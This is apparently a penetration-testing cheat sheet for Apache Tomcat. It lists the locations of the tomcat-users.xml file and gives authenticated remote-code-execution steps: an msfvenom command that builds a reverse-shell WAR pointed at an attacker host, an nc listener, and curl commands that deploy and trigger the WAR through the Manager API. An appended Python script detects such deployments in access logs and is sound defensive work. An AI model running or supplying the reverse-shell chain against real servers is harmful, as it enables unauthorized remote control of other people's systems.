Config Location
/usr/share/tomcat9/etc/tomcat-users.xml
/etc/tomcat9/tomcat-users.xml
RCE (Authenticated)
1. Create a WAR file
msfvenom -p java/shell_reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f war -o revshell.war
Sample Output:
$ msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.31 LPORT=1337 -f war -o revshell.war
Payload size: 13029 bytes
Final size of war file: 13029 bytes
Saved as: revshell.war
2. Start a listener
rlwrap nc -lvnp <LOCAL_PORT>
Sample Output:
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ..
+--------------------------------------------+
| Exploit |
+--------------------------------------------+
| 1. Login to Tomcat Web Application Manager |
| 2. WAR file to deploy -> Deploy |
| 3. Click /revshell in Applications table |
+--------------------------------------------+
curl -u '<USER>:<PASSWORD>' 'http://<DOMAIN>:8080/manager/text/deploy?path=/revshell' --upload-file revshell.war
curl -s http://<DOMAIN>:8080/revshell
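Detection side of the deploy steps above, as an added example that is not part of the original cheat sheet: it scans Tomcat access-log text for authenticated Manager deployments (text `deploy` and HTML `upload`) and pairs each with the first request to the new context path. It assumes the access log uses the "common" pattern (`%h %l %u %t "%r" %s %b`); the sample lines are constructed and `find_deploys` is a hypothetical helper name.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in the "common" access-log pattern
# (%h %l %u %t "%r" %s %b); addresses and user names are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2024:10:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2499
192.0.2.10 - tomcat [12/Mar/2024:10:01:09 +0000] "PUT /manager/text/deploy?path=/revshell HTTP/1.1" 200 62
192.0.2.10 - - [12/Mar/2024:10:01:15 +0000] "GET /revshell HTTP/1.1" 302 -
198.51.100.7 - admin [12/Mar/2024:11:30:00 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 15022
203.0.113.5 - - [12/Mar/2024:11:45:00 +0000] "PUT /manager/text/deploy?path=/x HTTP/1.1" 401 2499
"""

LINE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
# Manager endpoints that accept a WAR: text interface (PUT) and HTML form (POST).
DEPLOY = {("PUT", "/manager/text/deploy"), ("POST", "/manager/html/upload")}

def find_deploys(log_text):
    """Return authenticated Manager deploy requests and the first hit on each new context."""
    events, watching = [], {}
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        host, user, ts, method, target, status = m.groups()
        url = urlsplit(target)
        # Status 200 means the request passed authentication; 401/403 are rejected attempts.
        if (method, url.path) in DEPLOY and status == "200":
            # The HTML upload takes the context from the WAR file name, so it is
            # not in the URL and stays None here.
            ctx = parse_qs(url.query).get("path", [None])[0]
            ev = {"time": ts, "src": host, "user": user,
                  "via": url.path, "context": ctx, "first_hit": None}
            events.append(ev)
            if ctx:
                watching[ctx] = ev
            continue
        for ctx, ev in watching.items():
            if ev["first_hit"] is None and (url.path == ctx or url.path.startswith(ctx + "/")):
                ev["first_hit"] = (ts, host)
    return events

if __name__ == "__main__":
    for ev in find_deploys(SAMPLE_LOG):
        print(ev)
```

A deployment followed within seconds by a single request to the new context from the same source is the pattern worth alerting on; compare the `user` field against the accounts holding `manager-gui` or `manager-script` in `tomcat-users.xml`.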